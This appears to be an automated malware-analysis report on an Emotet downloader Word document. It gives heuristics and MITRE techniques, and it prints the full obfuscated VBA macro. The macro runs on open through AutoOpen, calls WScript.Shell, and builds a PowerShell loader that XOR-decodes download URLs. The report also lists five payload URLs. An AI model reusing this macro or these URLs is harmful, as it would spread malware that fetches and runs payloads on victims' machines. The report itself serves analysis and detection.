MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro utilizes WScript.Shell and CreateObject, indicating it attempts to execute commands or download additional payloads. The ClamAV detection explicitly names 'Doc.Downloader.Emotet-6877381-0', further supporting the Emotet family attribution.
Heuristics 11
-
ClamAV: Doc.Downloader.Emotet-6877381-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6877381-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa)) sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425) RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai)) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa)) sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425) RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai)) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "qSYjdcd" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.bobomotorcyclerental.com/FXcSPO/ Referenced by macro
- http://www.eobienxanh.com.vn/lnHq/Referenced by macro
- http://www.lanortenataqueria.com/OVgUg/Referenced by macro
- http://www.creedcraft.net/MZD6i/Referenced by macro
- http://www.ilkanilaranaokulu.com/aTlZC/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15821 bytes |
SHA-256: b93cdc2a2ab07ee2c1b1e94a8d2156616efb5e52226fb555d1c4875d599bc98f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
317 of 591 identifiers look randomly generated (e.g. 'zXJqGLhiaJSkE') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VcRUbpYWw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qSYjdcd"
Sub AutoOpen()
On Error Resume Next
uzKUYH = 27683 * DTkHMS * 15121 - zrXsHn / (boATM * aBDoMp * 77444 * 90158) / (22825 / HIiRO - XbBDkO * fVVGp)
sqQjJ = 99564 * tVnGq * 91457 - mhwiMz / (ZUjBIj * wCRPqw * 27455 * 91185) / (46897 / zETiO - VuUKJD * MDAcTW)
DrKnN = 90477 * IqbqJD * 3717 - zibmPd / (rzSon * VmIGB * 81359 * 68674) / (76136 / jkPXV - iXioT * fMGCN)
jXnBwc = 35675 * SzcTzm * 59398 - jZWuo / (ZSJFM * XSriwM * 60287 * 78616) / (38465 / mpwGE - YjlckP * wkvuPw)
wbAMQ = 57999 * aTSRw * 79270 - YfOvj / (QaTAr * RSIlZY * 23645 * 66824) / (79135 / jjLAkw - zdPlZw * vEjMwW)
WssYC = 72946 * NYNPL * 90973 - qDNkzN / (QnZAqO * uhFVi * 36928 * 44128) / (72386 / ijrLi - ZAJEDl * bsvjU)
fBTNvS = 42285 * zzNrIi * 71526 - iOKWO / (nWlvF * MpWuY * 83791 * 70137) / (92255 / Fjwbiu - wSuOb * WNJzSY)
AUmMr = 35236 * tsmGju * 92430 - jjbUzT / (bssUa * UpAmTV * 67024 * 28271) / (47604 / tduGld - sEmQUz * cYodtt)
lcwzqMqaw (AMiGQLcAnq + qEzrUrKE + MkMiFOmX)
qvhaL = 72869 * lvThdt * 46078 - VdlBJ / (wRNIRr * JUlTz * 89321 * 81469) / (75656 / wJOSCV - vwzIBa * EdpZt)
sTBXVi = 70692 * mCNRN * 35637 - alpSHh / (aEzLo * KFXmIu * 65764 * 53510) / (3686 / zVqAt - PYkNlY * SKEBp)
ETYMW = 19719 * rIujc * 19932 - BfBGC / (kOYql * YZFMa * 96811 * 97039) / (31566 / iJXUAL - RGdctj * wrpiz)
URuunb = 51216 * Oizhfu * 63613 - mrtbiS / (SiEjH * qJUwJH * 59681 * 28604) / (39507 / avDhUA - Wjjcqz * SzCHcL)
End Sub
Function AMiGQLcAnq()
On Error Resume Next
GlkWkW = IZctE / iJowEJ * 61693 - GOzZH * VzIjYp * FzAhwz - 53457 + EwVPO / 32119 + WfHKi
sZAldj = 56211 - pLsMhr / 18030 * 70230 - 90602 - AJLilE - 63052 - ATdaO * 38263 / 11129 / 98890 - LcLUK
ZzHLok = (43419 * joQGDO - 47193 + afoDfw * (30473 + bIuiH / LdQlcH / Cvjmd - zpuwj * OIkLv))
zXnzd = DKRsUO / dMnPH * 23672 - wCPcJ * RIaccO * CFZNj - 37763 + YAmGA / 2083 + mAjQzw
iULZSGm = "wershel" + "l " + " " + " ." + Chr(40) + " $vER" + "bosE"
PdCVfb = (89764 * CVUbl - 80760 + FVLVLI * (94555 + ciNSw / aLqzGL / QtOTvP - hkELH * fivIhl))
bhzjfp = (84481 * sdnpRm - 31890 + XkEQB * (64174 + ThKKQ / iaRVqA / USPtuq - UCEjz * ukAGit))
nchRQw = (88527 * fuwOLm - 54991 + YAtQoo * (25807 + zUhObt / bwbFC / lfKFK - cKLVq * siwNA))
MZqRJ = (93154 * bKdif - 59377 + obwCP * (86204 + ksZBKC / wPhPU / iqCwJz - qWGaj * oqCwGR))
nBmaqJuaBF = "prEfERen" + "cE.t" + "oStrIng" + Chr(40) + Chr(41) + "[1" + ",3]" + Chr(43) + "'X'-J" + "oin''" + Chr(41) + " " + Chr(40) + "[" + "StRiN" + "g]::JoIN" + Chr(40) + " '' " + ", " + Chr(40) + "'8" + "K72_97<1" + "10S17w"
dSdva = (56647 * XJGSMa - 71877 + Sjpmm * (10855 + nsOjQf / ojIzl / wqoSv - ApicY * AdYupC))
wOuRv = (33624 * SmcUQj - 62715 + omUiL * (58192 + kcnzqC / PSOzXG / OUktZr - zpvlK * DriipZ))
KzZWq = (97930 * DAbiEG - 34972 + KXnzI * (51883 + atwhz / ACuauz / UshRY - zAsjNC * QpYMTD))
Psilju = (25034 * zVXKP - 77751 + dcvXqi * (9106 + EPqvPB / ttFJWR / EHXiD - UKSIv * AwzSL))
YdwEo = "66v73<" + "91<1v6" + "7<78J70K" + "73>79" + "S88w12J98" + "K73v88>" + "2_123K7" + "3J78"
nTrdc = (64922 * UzvUoC - 82661 + iNBsd * (99212 + jfjzz / vsPJKz / sQfww - iLiiG * kQAcq))
HWjZIw = (13770 * zhDKG - 12608 + SpWbWb * (4817 + MifWZL / iHqREz / HIZiz - KdDvX * WiprhH))
FoDjOQ = (98700 * firFr - 97223 + nELvl * (67717 + GJzYA / IVLVn / aGqZqV - oWjLz * dKQzXw))
dFQjLt = (56741 * DYHfLi - 4926 + NRiEvX * (32145 + AwciM / uPZUj / tJFmTM - KDDXb * DCjul))
kojzRzqLjz = "o111<64w6" + "9e73" + "_66o88e2" + "3>8S64" + "v103J" + "78w17_" + "11<68K" + "88>88S"
jPlHw = (72853 * smVmiw - 59513 + hdBrUV * (70412 + lNHUc / tZElz / AEQwC - MuEZi * AQYiRb))
Kkhul = (80686 * nOKSV - 34826 + XCziV * (51472 + uwazz / XBsXnX / QqYvnA - jaMNq * QFISSC))
IjoPaw = (18983 * dnFoAW - 88837 + qtEkZ * (77988 + UpWvu / ztqoGw / QHjnX - XUmAs * WYbVi))
BwvAtp = (33081 * bswit - 97179 + zcNCpR * (18852 + PLiPUL / OIcEwE / EWJkh - BIrptZ * wRPmP))
SPZCJivXDb = "92o22K3>" + "3_91" + "S91_91<2K" + "78_6" + "7<78>6" + "7w65e"
vDmmk = (49535 * rNJXH - 80406 + zVKzi * (57800 + FZMKo / PVGdLp / rYNJzF - QDhDPK * fjHtjo))
SUYUZD = (3296 * ljuPz - 88523 + VGiKQ * (25340 + Qmhod / XXWXHK / cAwifm - QraWA * cBRsLS))
nmQjT = (14918 * jIvjR - 34391 + dSTBN * (35960 + GpRwPJ / QttXOH / HYBhD - OnGMf * PcGmpt))
qiZbw = (89712 * VHjLSz - 28740 + HBCZB * (78215 + rJvdm / pzkfBf / uohAL - uvBswN * GZFqHm))
mwVBwdL = "67_88_67" + "v94K79K" + "85K7" + "9<64w73w" + "94w73w66" + "v88>77" + "K64<" + "2S79" + "K67v65S3" + "S106>116" + "w79>12" + "7_124J99"
wNOtN = (69043 * fFIzf - 18012 + SLVwqF * (5162 + uiCsid / wnjuUf / wfFtA - sQHXS * zvqUi))
djzwh = (7548 * jQPBID - 19672 + VuSUKu * (61221 + jFTUt / KHEdt / hKZTdF - wYEDbl * GLTVj))
LNwXvn = (97481 * HVslz - 4242 + IEiRE * (66363 + rwZjSI / YqQoKA / oUimmt - RkSziz * cuOWG))
XQTjrV = (2407 * lHUNlp - 1495 + PpszEr * (79463 + XiZdfw / SFQwP / MoksaZ - vumdEw * AbhZjb))
GaZMEO = "K3e108" + "w68<88>8" + "8<92w22K" + "3e3J9" + "1<91e91>2" + "<73<6" + "7S78o6" + "9_73>" + "66_84" + "K77J66J6" + "8v2v79" + "J67v"
qhjioo = (66035 * jkiSj - 24995 + NWIpmD * (72894 + LhYDA / MmbKA / hkNsNE - pauISf * ViJBI))
VzzOVq = (23209 * ibzoBZ - 39662 + zfSpra * (22802 + joIXv / BRDSGo / PRvhC - IVLcaw * vjERrv))
IREbK = (26529 * LpUhFP - 10811 + OwowKt * (52785 + dYSYj / Fkzbz / DKkRO - PjIFvY * cdcEcQ))
EMVAQl = (64375 * TzHHf - 63178 + dJQbh * (38816 + uRZGXp / idZCQb / OMbcX - VdnAnw * sZsaa))
IMGNXCi = "65e2<90v6" + "6<3<64" + "o66e100" + "v93e3_108" + "K68K88o88" + "w92S" + "22>3K3" + "w91_91K9"
tlrCYw = (18003 * iHDLR - 75532 + ZUiwJJ * (44092 + jAMmYF / Mwiaj / MjIdQ - ZoVMz * GZEll))
jAaCr = (78908 * Ikjid - 29981 + dEMWji * (57830 + IXdufE / cjXLc / DjhaZU - wZXRI * zZPis))
fYbtOA = (86848 * VkStk - 87535 + jJJZzN * (66684 + QzIFA / UjMtG / onKQv - NrHbXv * ZZCGp))
bWmHCM = (19766 * BhuFjr - 8017 + NoVStv * (95817 + NoMRS / wbMwwM / EiwTj - ruQfH * ILPPT))
jNlGBKt = "1o2S64w77" + "v66<6" + "7S94w88K" + "73J66" + "v77_8" + "8S77" + "<93v89S7" + "3v94_" + "69J7" + "7<2o79J67" + "e65S3<"
GTXWsE = (35954 * idjaw - 10828 + Tkidru * (99545 + SDvDDF / NLiCO / ErSwO - IYmwTh * LTiiDh))
bzSLw = (10665 * tIAEGA - 56837 + CvwtdY * (98944 + zoaNqa / RaWZiV / cOKAh - rCVXR * WiDMLv))
YMTiBY = (51321 * vWbiwO - 37845 + kdBEPS * (14591 + fCzTV / ABtfbM / RwoMb - dvIMi * USwRK))
XETwA = (28974 * VQYww - 82085 + OsPjdO * (84051 + jGcWN / ujcaUI / zYWwzM - INzWqL * bOCaTO))
XQsOC = "99J1" + "22>75S121" + "J75e3e1" + "08_6" + "8o88<88_" + "92K22w3" + "v3e91>9" + "1v91" + "S2o79S94" + "J73v73v" + "72o79"
zGaDc = (16209 * vKNRr - 11239 + SzCzf * (99649 + WDXpDw / LXIni / wOhlq - BJGjpd * VcAbA))
GENzwa = (14250 * VVaoT - 75580 + qSfNs * (75768 + iKWqO / BIEjj / UHoSzN - QwHUT * vAdzQE))
GAJiVA = (67528 * BYpwbn - 2842 + snrqJ * (80235 + wqVwQ / SclQGT / OdIXiv - Aihkc * vfvTA))
EiaCDN = (47757 * sjmEi - 25170 + ZERQIo * (97126 + QUhMpb / KwICZn / LiYRf - ZUiLQ * wYiLr))
RrIiVZkDj = "<94v" + "77J7" + "4>88o" + "2>66K73v8" + "8>3_97K11" + "8>104K" + "26v69S3<1" + "08w68"
irvjO = (70065 * VvQmQ - 2650 + XldWB * (84824 + KAsHW / jaXQT / uUAFC - iqVcnn * NqlYmu))
QvNsAE = (35642 * iwEjU - 39276 + mPiUI * (25808 + ESIlTs / njSQTC / BlITQq - DZBPI * JQQws))
RfwAq = (56778 * EkDrso - 58241 + UPBNcB * (54052 + AbdZl / BcjJZE / ZqGjFV - GJhQJ * XqrBQ))
ACXqCb = (86314 * pvYzT - 85605 + zXfbc * (35182 + BhNFW / VwCkV / XrwJC - AKAZEn * sGsOs))
TlilWwUUXCK = "<88S8" + "8K92K22" + "K3e3w9" + "1_91_91_" + "2K69o64_" + "71<7" + "7K66" + "o69e64K" + "77S9" + "4K77S66o"
AMiGQLcAnq = iULZSGm + nBmaqJuaBF + YdwEo + kojzRzqLjz + SPZCJivXDb + mwVBwdL + GaZMEO + IMGNXCi + jNlGBKt + XQsOC + RrIiVZkDj + TlilWwUUXCK
tddWG = (58811 * nwTYoa - 81422 + LpUICF * (56912 + fUqwLh / ftoOz / lwUmto - bIraHC * YGJuO))
pXzZN = (7615 * aiaIj - 27897 + HvZvhW * (61083 + BruNQ / HKlis / OSbRt - tvjjAz * iObRw))
kcYzsf = (92592 * PuFLI - 38392 + zuQDjf * (40447 + lBYSNw / wIDzI / WFLZl - YklDIW * iMWhN))
twBPh = (77212 * uniAL - 83102 + aszVI * (32920 + IWcQpI / cYkuA / smvFEF - BnirPQ * wjHnlw))
End Function
Function qEzrUrKE()
On Error Resume Next
IScnB = (6509 * cHtXW - 34633 + SCshM * (33810 + iVULAR / aGjHWY / azvGov - FhPRim * bPrFmX))
PknwU = (24956 * VwzzHI - 22126 + boEizv * (93087 + zzQwF / EZapv / aiHrMD - anowz * iHYSD))
IDhiHm = (5976 * YMPrN - 27840 + dVVFt * (45667 + EdlSs / YZVUwO / lmavd - uvnCt * mHptLK))
zIbAmf = (3864 * NPzta - 84366 + wbYVS * (54206 + EuWisw / pCkBMd / TFCQYE - ARlMA * SPhQE))
FwsMVzdLri = "77e67J" + "71v89" + "e64_8" + "9o2K7" + "9o67o" + "65J3_" + "77J12" + "0e64e" + "118w1" + "11K3v11J2" + "<127S" + "92K64"
NjdAUo = (11425 * ThkJK - 21527 + INUsdU * (54955 + TuTNr / jZawqU / Fjluo - dOWnp * lplQqJ))
anzEt = (78270 * alwruv - 97811 + dquabY * (56549 + QasTF / jfJJl / ilihGj - JwvHzA * dwwkjm))
NzWwH = (38475 * zZWFHB - 14803 + wfNUH * (688 + iJoKJp / sTzzfi / NWTYzG - GPjuiz * NHwiHd))
lOJGBb = (27216 * mIKLT - 82095 + DjiwoM * (97770 + wGifG / uJkpOj / vakTas - GMcVrv * FhsVQm))
HsEwGMPhk = "o69J" + "88v4S11" + "J108J" + "11S5o23J" + "8w86<" + "120e122" + "J12v" + "17<12" + "e11J2" + "7o26J"
UDjjMi = (5145 * HqzUam - 86611 + iMKsS * (72960 + rYWwaz / zJZGi / qjjEB - Aiakt * LoRJE))
NHwKC = (45247 * CIJVZf - 72516 + uvItz * (45018 + EQiptf / BSXEE / PWNwjE - HZYFT * EMAVOf))
dXUNvN = (58185 * FiJtK - 88458 + djiRir * (12205 + wEijES / GqzzK / EjbLvV - Dffska * zQizFW))
fiYoIq = (65195 * pGtovU - 14228 + hCcFqD * (72268 + QndlOL / nFmawn / YtXZZ - pmpYDi * Pjwvb))
sjoXtZaL = "29J11" + "w23>8K95" + "<120J101" + "e17J8>73J" + "66v90<2" + "2K88" + "<73S65_9" + "2e7o11J11" + "2K11S7o8" + "<86S" + "120K122"
jWivY = (79654 * HsQwQq - 61149 + YNFmzG * (77357 + wFUOj / mLnTjn / CasvpF - QEHVOQ * BcNSv))
VIMiZF = (97630 * TuLjBZ - 5996 + FiWWa * (36780 + qzijJ / LBunlj / OhVQk - MljAYM * JYOizS))
mqFao = (67395 * WjzYz - 39897 + AZWZQJ * (66615 + nmdAGV / CrqtN / ujuvBR - MNnXuj * pAjdp))
MjpDaF = (39982 * EIzJr - 1525 + mNqKB * (92277 + uwwAQl / iZAlsj / loUkk - LvKMWP * PPWIuz))
GIzaYzjL = "o7S11" + "_2e73" + "o84>7" + "3w11" + "<23v74o6" + "7J94K73>" + "77>79e68K" + "4<8<126" + "K92o111" + "<12_" + "69K6" + "6e12"
UrhCsX = (57285 * TCcTOZ - 60569 + raGGS * (84370 + SJwfdD / GouOwF / VZOCLm - LzuZt * WWjvKc))
nDSznc = (98541 * jFhGG - 29865 + qcdPs * (87422 + awFGZG / CINDiw / QwIYSm - IGQnQI * YFNzqB))
XbIhq = (73603 * arMjY - 89871 + XitVV * (2620 + mIknIK / cbNMI / zbDuo - nrbFmz * mvHIB))
PtusA = (87222 * woYzd - 50471 + VArDGF * (51433 + LDGkS / jEzEUC / cfWCS - SWYvv * qBWsr))
MzGGUj = "_8K64_103" + "S78K5>" + "87>88K94" + "K85S87K" + "8w72" + "o97<110o" + "2K104>" + "67>91J6" + "6K64>67>"
aQaGb = (6721 * czlhzI - 99822 + zwZcYC * (99090 + iEAzXs / rDqTm / EufFPS - Vhlwa * cLvJD))
pPkTY = (88783 * bzzQwX - 31780 + Mwfwjk * (27273 + KCznHY / VSMpS / MIfAGI - uLHPjG * zcJUlb))
ufpurh = (47818 * rTpzjT - 70797 + YjLqY * (94623 + Lwzpr / wirwI / XWcUKf - UPkiT * ZKqzu))
aUsBa = (11187 * jntiH - 77855 + vvEuX * (17421 + laATBX / Pwwun / LXLsE - LiabDd * MPhGA))
GakcOon = "77o72o1" + "06e69" + "K64e73w4w" + "8w126S" + "92<111_" + "0_12w8" + ">95J120"
UsDbQ = (23158 * YozBO - 64179 + TnPpiM * (29600 + Hormw / VLCDn / bBoEJG - UlikOK * tqfsL))
Nziiw = (89061 * hYukwB - 53298 + MjvPBK * (14756 + maUifS / Gkwmu / tsjZSw - aimdrj * iuitz))
IvAHLI = (2954 * zWwmG - 51016 + uBYrAk * (9885 + IvRpLt / nMwIsB / IOLiV - uLufMV * ZScLz))
qRkPkd = (29161 * Cdzwb - 86936 + SwLjb * (57665 + RcDcct / fjKrA / JQZTfr - RIhmm * zbrUM))
ZlcUzq = "e101" + "J5J23<1" + "27K88K" + "77<94" + ">88w" + "1>124S94" + "K67w79>7" + "3S95w9" + "5o12o8_95" + "K120J101" + "e23v78>" + "94w73S77_"
jvLHo = (1111 * COBBos - 19955 + zpmiV * (31968 + VvEzO / iMmzY / zUkNE - FLzZDs * QvjSKH))
SsMtS = (81594 * Njkozh - 88460 + tKfWOi * (66059 + BmdpoK / jmJpj / wUtnt - LaFhi * SjIwpk))
zCocZ = (82946 * opdGmO - 11584 + YHsSS * (87897 + ScmriC / jXEAdK / wRuTm - zJpXk * rikiX))
INZQC = (79693 * QYBPEP - 52951 + CMciv * (30843 + YwrLM / buucqJ / muUKP - omwKz * KGsWpc))
hDjvPjWpQn = "71e2" + "3w81K79" + "_77w88_7" + "9<68S" + "87e81" + "e81'.sPL"
dlwbY = (53295 * zQnHM - 40585 + ZIsnPj * (77778 + QhEzd / jjBEM / NZqtN - nNwcms * qaTlU))
SXkLq = (64050 * awFFC - 73393 + vNaqzz * (61719 + bImOHL / Jwthr / mVmbN - MQtEn * zbiIuh))
BJlhS = (19588 * LkzoFi - 71654 + cvpbnO * (49966 + LwMUbd / OHnJM / TWJMv - lDXlEG * jfMKG))
zkJVOW = (49009 * SNjmDz - 24113 + zRwaPv * (51597 + nvMhm / QuhZOY / EcWnA - AMqis * JaBmt))
tJSjX = "It" + Chr(40) + "'ve<_" + "oK>wJS" + "'" + Chr(41) + "| fOrEa" + "Ch { [C" + "HAR] " + Chr(40) + " $" + "_-bx"
qEzrUrKE = FwsMVzdLri + HsEwGMPhk + sjoXtZaL + GIzaYzjL + MzGGUj + GakcOon + ZlcUzq + hDjvPjWpQn + tJSjX
vOanLn = (49027 * cHlCjj - 68058 + nsQnd * (85266 + ShDvq / fQZUW / TiwVF - FuXVE * HlZvBG))
biakG = (80154 * idijR - 38946 + YJYjP * (84121 + oXnLI / JwbCz / JljslD - iHHUr * kitXG))
FKMctC = (55455 * Nbthqk - 96118 + wJwzt * (99109 + mGlPk / dkXIo / HNPULA - kEQom * XwKVwu))
CDBIF = (15595 * iawqMi - 19774 + QboWLb * (46314 + qwcPoF / jPSATw / asNOd - zjJWdZ * zGivs))
End Function
Function MkMiFOmX()
On Error Resume Next
vEEINi = (45742 * azMzF - 69735 + nbNoP * (28281 + bCOchw / iLPHuK / oDJiDj - wDlrwG * EzJjcF))
GAaWHn = (84696 * kqWZCr - 82118 + jolwqP * (9858 + RwZNE / PYNCl / ntMXI - AOuPkz * HdjNwv))
BRALma = (26396 * rQtTNL - 27886 + ckXGUt * (69575 + OAJzQ / GUDGl / XWphik - cnCbi * PXkZv))
Bulwbb = (84323 * wrLZSw - 45977 + JLfCi * (99404 + klpAiM / bSFFn / YhbHv - GtjWo * jvzUzC))
MtUWSZf = "Or '0" + "x2C'" + Chr(41) + "}" + Chr(41) + Chr(41) + Chr(41) + ""
MkMiFOmX = MtUWSZf
ZijMll = (16264 * ocIiz - 21752 + frZGJC * (80834 + aFbit / fMlhz / zqqijS - cmcpG * alzJPk))
IhwwlQ = (31713 * mKYQG - 51214 + IFvqY * (69448 + HRMZfi / hVvHc / LbZDQR - cROlUE * HRpjWu))
LrpEv = (18854 * NCzaWO - 17755 + azntt * (90834 + WNmbil / jDajKU / iYHatH - tjodm * nrFDdP))
jbJHKC = (28373 * IQXwwZ - 68097 + BvariN * (32111 + PUwSii / VzXCV / jUdDkU - FsHLr * wOotzW))
End Function
Attribute VB_Name = "zXJqGLhiaJSkE"
Function lcwzqMqaw(zEQRKXmFB)
On Error Resume Next
wEbwlH = DjurN / CDrfwL / (oFGsA + 54343 - GTwzX - LBXNuS - (51435 * Spdmvt))
qwQhJw = abaslo / cEtsj / (mpiko + 23066 - oPRdhz - bNnUjv - (14318 * iPNatZ))
SBouv = nAjjWA / DJiiWJ / (RLwFzD + 39632 - zcpqD - wVZYiJ - (45296 * FfIzjr))
EZrUUp = Sjszw / LJzLl / (dPQZLn + 94786 - HOXOSa - LslMfz - (50264 * HbjwGl))
wWOWTi = PSZKLN / fztIFB / (qIHaP + 83951 - qoTDW - HpSUH - (34403 * lpfqTZ))
BndDUk = rwjvJ / AjmvUk / (Ajili + 71387 - WPcFF - jEfTwD - (85308 * KYdwI))
iCAIh = rikkBT / wNHFD / (nzPcpw + 38255 - Mhqbw - AHFAi - (76544 * mJbJma))
niDiSL = oVIrZj / nbWdq / (wvDSwQ + 84883 - qHBmV - inLtnt - (13398 * jWbXUa))
sADiUkpWFB = fScszc + CreateObject("Wscript.shell").Run(OAzwzrj + Chr(vbKeyP) + oPoIO + Chr(vbKeyO) + zEQRKXmFB + UbJQPFFVfw, 529318425 - 529318425)
RfqSM = orQtW / jJHXjf / (YMQvpU + 25358 - IntDsA - PfVrj - (87084 * iELai))
HLhAj = jFNHw / mmYiG / (oohpf + 49128 - nWaBc - Hpitf - (12499 * XzpCc))
wSiuhz = SipbwT / lAmmvD / (GBkYu + 26425 - LLJwRu - VEzRi - (42884 * TIjfu))
XDfsM = Zkilb / jIzsC / (ElroO + 7395 - tXojrw - NVBzIi - (26529 * DjdEHb))
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.